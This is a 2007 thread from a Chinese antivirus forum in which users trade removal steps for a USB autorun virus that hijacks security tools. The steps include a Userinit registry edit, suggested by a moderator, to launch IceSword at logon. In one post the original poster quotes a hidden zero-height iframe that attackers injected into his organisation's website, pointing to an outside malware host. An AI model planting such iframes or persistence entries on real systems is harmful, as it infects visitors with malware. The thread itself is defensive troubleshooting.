仿随机8位病毒的7位字母病毒 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛仿随机8位病毒的7位字母病毒

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

仿随机8位病毒的7位字母病毒

程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:	发表于： 2007-06-11 21:18 \| 只看楼主短消息资料字号：小中大 1楼仿随机8位病毒的7位字母病毒今天主任的电脑终于中毒了！症状和前几天随机8位病毒差不多，但是用winrar查看目录文件，发现winrar一闪而过。隐藏文件选项被修改，最后改注册表回来看，病毒文件是：autorun.ini和ibvtcgv.exe. 一数是7位，先按原先的操作做，发现不行。心想winrar不行了，怎么用改名大法呢？我把所有系统安全工具都改名试过了，发现autoruns.exe可以用，也发现好多好多的映像劫持。大名鼎鼎的SREng icesword 卡卡安全助手均无效，USBCleaner.exe可以用但不治本。查询资料中发现2个好东西，都是在论坛里面发布有的，确实好用，有效！一是ProcessExplorer 二是凝逸反毒nyfd5.6.3(http://nyfd.n-cn.com/download/nyfd.zipfd) 推荐的凝逸反毒一键清不行，被禁用了。方法：先解压使用ProcessExplorer 在explorer.exe下会有2个病毒文件ehjalrp.exe和quqnrtl.exe鼠标移上去会显示其路径在c:\program files\common files\microsoft shared\ 和c:\program files\common files\system\(好像是)现在找到位置了就用凝逸反毒的资源管理器（很有特色）把两个病毒改名，删除不行，会重生。马上复位重启，现在病毒进程不在了，用autoruns.exe把该死的映像劫持删除。保险起见查找注册表中ehjalrp.exe和quqnrtl.exe予以删除。现在你的卡卡啊icesword又有用武之地了！还有个东西，在c:\program files\meex.exe 是病毒把它删除。我现在把瑞星重装了，正疯狂杀毒中，弄了我半天。这是我第一次发表杀毒经历，主要是网上没有找到这个病毒的查杀方法。有个说xp系统下命令行手工清楚的，对于win2000我没有采用，我这个方法可能不是最好希望有高手指教，造福广大群众。 2007-06-13 09:20:57
程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:	分享到：

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2007-06-11 21:20 \| 短消息资料字号：小中大 2楼样本有留么
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

孤独更可靠锋芒艾服狮帖子:1788 注册: 2007-01-27 来自:	发表于： 2007-06-11 21:24 \| 短消息资料字号：小中大 3楼汗一个,好像前星期有遇到个``
孤独更可靠锋芒艾服狮帖子:1788 注册: 2007-01-27 来自:

程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:	发表于： 2007-06-11 21:26 \| 只看楼主短消息资料字号：小中大 4楼遗憾没有不过据说是从这个网站上来的，最近我们网站着挂马勒，挂马的网页我还留的有。给我加了这个代码"<iframe src=http://w.mh8888.cn/ad.htm?m width=100 height=0 frameborder=0></iframe>"就是这个网址,败坏我们单位名声.
程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2007-06-11 21:30 \| 短消息资料字号：小中大 5楼【回复“程凯哥”的帖子】又是这下三烂的DD！！ 1、将IceSword.exe改名为IS.exe，放在C盘根目录下。 2、打开注册表编辑器，展开： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 将"Userinit"="C:\\windows\\system32\\userinit.exe,"改为： "Userinit"="C:\\windows\\system32\\userinit.exe,C:\IS.exe" 重启。重启后，用IceSword宰它！上来，先用IceSword禁止进程创建。紧接着————结束explorer.exe进程。注意：动作不要太慢！此后，你就慢慢宰吧。
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:	发表于： 2007-06-11 21:38 \| 短消息资料字号：小中大 6楼谁有样本啊~ 麻烦发个吧~~
tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:

程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:	发表于： 2007-06-11 21:43 \| 只看楼主短消息资料字号：小中大 7楼哦受教其实这招就跟病毒用的的手法差不多，借userinit.exe 启动IceSword.exe 不过今天我试图把IceSword120_cn.zip解压被提示说出错,解压不成功,文件夹里面一片空白.压缩包里面的IceSword.exe倒是没有改名.先改名过去可能会有效.
程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:

tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:	发表于： 2007-06-11 21:44 \| 短消息资料字号：小中大 8楼【回复“baohe”的帖子】猫叔如果注册表编辑器打不开呢? 能不能用注册表项导入注册表呢?? 我写了下面这个,你看有没有错啊,为什么最后导不进去呢??(我把注册表监控也关了)
tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:

程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:	发表于： 2007-06-11 21:46 \| 只看楼主短消息资料字号：小中大 9楼要样本,看明天找的到不,记得一个同事的移动硬盘中毒时还插在电脑上,里面应该有样本.是把几个病毒文件复制了压缩发给你么?
程凯哥初生襁褓狮帖子:43 注册: 2005-10-14 来自:

tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:	发表于： 2007-06-11 21:46 \| 短消息资料字号：小中大 10楼忘了附上了附件: 文件名:8388072007611213628.bmp 下载次数:249 文件类型:application/octet-stream 文件大小: 上传时间:2007-6-11 21:46:49 描述:
tankk 自信弱冠狮帖子:469 注册: 2007-02-05 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT